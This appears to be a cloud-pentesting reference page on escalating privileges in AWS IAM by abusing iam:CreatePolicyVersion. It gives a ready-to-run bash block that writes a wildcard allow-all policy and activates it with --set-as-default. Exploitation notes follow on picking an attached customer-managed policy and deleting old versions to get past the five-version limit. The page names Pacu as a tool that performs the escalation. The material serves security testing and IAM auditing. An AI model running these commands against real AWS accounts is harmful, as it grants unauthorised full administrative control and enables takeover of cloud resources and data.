CreatePolicyVersion

A managed policy keeps up to five versions, one marked default. iam:CreatePolicyVersion with --set-as-default publishes a new version and activates it in one call, so if you can edit any managed policy already attached to your principal, you rewrite it to allow everything.

Grant full access#

bash
cat > admin.json <<'EOF'
{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Action":"*","Resource":"*"}]}
EOF
aws iam create-policy-version \
  --policy-arn arn:aws:iam::<acct>:policy/<attached-policy> \
  --policy-document file://admin.json --set-as-default

Your principal now holds *:* because the edited policy is attached to it.

Exploitation notes#

  • Target a customer-managed policy already attached to you; AWS-managed policies cannot be edited.
  • If five versions already exist, delete a non-default one first (delete-policy-version), then create.
  • SetAsDefault is the key flag; without it the permissive version exists but is inactive, which is the SetDefaultPolicyVersion case.

Tools#

  • AWS CLI (iam create-policy-version).
  • Pacu (iam__privesc_scan): detects and performs this path.

References#

Cookie Consent

We use cookies to enhance your experience. Learn more